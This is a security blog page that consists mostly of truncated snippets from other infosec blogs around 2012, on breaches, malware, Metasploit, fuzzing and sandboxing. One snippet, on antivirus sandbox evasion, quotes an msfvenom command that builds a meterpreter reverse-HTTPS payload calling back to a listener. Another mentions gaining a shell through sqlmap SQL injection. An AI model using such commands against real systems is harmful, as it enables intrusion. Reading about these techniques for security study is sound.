Welcome to my personal Blog - In here I blog about Information Security and in general anything I regard as newsworthy. On the professional side I am currently working as an EMEA Practice Lead at Verizon Business for Threat and Vulnerability Management
5000th Tweet
-
Today I posted my 5000th Tweet. I've apparently been a Twitter user since 1
December 2008. I remember not Tweeting anything until 15 July 2009, when I
att...
Tax Return Identity Theft
-
I wrote about this sort of thing in 2006 in the UK, but it's even bigger
business here:
The criminals, some of them former drug dealers, outwit the Inter...
Weekly Metasploit Update: Dev Docs and More!
-
This week in the U.S. is the unofficial start of summer, so that probably
explains why it's been a bit of a slow week in the Metasploit community,
hackin...
support of sessions + notes !
-
Hi,
I changed a lot of things in the output, and now you can choose your colors, and the overview of a method is better:
But an interesting feature is t...
TACK
-
(source/cc) Those who read this blog know that I have a particular
fascination with our CA system and how screwed up it is. The good news is
that I'm not ...
Flame Malware, Targeted Attacks, and You
-
It seems no good holiday goes by without some quality new malware being
dropped, and this year's Memorial Day was no exception. Announced in posts
by Kaspe...
SQLMap - Operating System Takeover - Windows
-
Today I'm trying to use "OS takeover" feature of sqlmap. sqlmap can be
used to get command shell using sql injection. sqlmap provides following
options fo...
WHMCS Breach May Be Only Tip of the Trouble
-
A recent breach at billing and support software provider WHMCS that exposed
a half million customer usernames, passwords -- and in some cases credit
cards ...
5 Favorite Security Reads of the Week
-
Here’s a listing of my 5 favorite on-line security articles, papers and
blog posts that I read in the past week:
- Why the Public Cloud Shuns Security...
PaulDotCom Security Weekly 288
-
D emain 17 mai, on m'a très chaleureusement invité à participer au numéro
288 de l'excellent PaulDotCom Security Weekly. Programmé en live à 18:00,
heure d...
A meandering rant on sexism.
-
This has been a bad year for technology. Not necessarily for the business
of technology (although it is very hard to discuss the current state of the
te...
Why Sharing Raw Data is Important
-
Bob Rudis has a nice post up “Off By One : The Importance Of Fact Checking
Breach Reports,” in which he points out some apparent errors in the
Massachusett...
“Building a Better Anonymous” Series: Part 6
-
Building a Better Anonymous – Details By Josh Corman & Brian Martin 2012 If
you are new to this series, please begin with Part 0 and the index.
NOTE: We wi...
Computer Forensic Failures - File system issues
-
I'm very happy to report that I received short story that clearly resulted
in the author learning from their actions. The author of this story wished
to re...
Telegraph Relay Controller
-
A bit of old-school hacking today. I picked up an old J.H. Bunnell
telegraph relay, which from what I’ve been able to deduce is a mainline
type 2-3 relay m...
vsftpd-3.0.0 and seccomp filter sandboxing is here!
-
vsftpd-3.0.0 is released.
Aside from the usual few fixes, I'm excited about built-in support for Will
Drewry's seccomp filter, which landed in Ubuntu. To g...
CapLoader 1.0
-
I've been playing with a beta of this product for the past month or so.
Straight from Erik's writeup:
Here are the main features of CapLoader:
• Fast loadi...
Antivirus Sandbox Evasion (part1)
-
Hmmm, it seems that I wrote something very nice .. $ ./msfvenom -p
windows/meterpreter/reverse_https -f raw LHOST=172.16.1.1 LPORT=443 \ |
./ultimate-paylo...
SSL optimization and security talk
-
I gave a talk at Cal Poly on recently proposed changes to SSL. I covered
False Start and Snap Start, both designed by Google engineer Adam Langley.
Snap St...
Pwn2Own Pre-Game
-
Just in time to get warmed up for Pwn2Own, we are delivering a joint
offering of the training courses “Bug Hunting and Analysis 0×65” by Aaron
Portnoy and ...
Summing up SVG fuzzing in browsers
-
Hi there. As the title states, this is a summary of SVG fuzzing results.
Today I would like to prattle a bit about what I was doing for some 2 weeks
in t...
NWScript JIT engine: Wrap-up (for now)
-
Yesterday, I provided a brief performance overview of the MSIL JIT backend
versus my implementation of an interpretive VM for various workloads.
Today, I’l...
0 comments
Post a Comment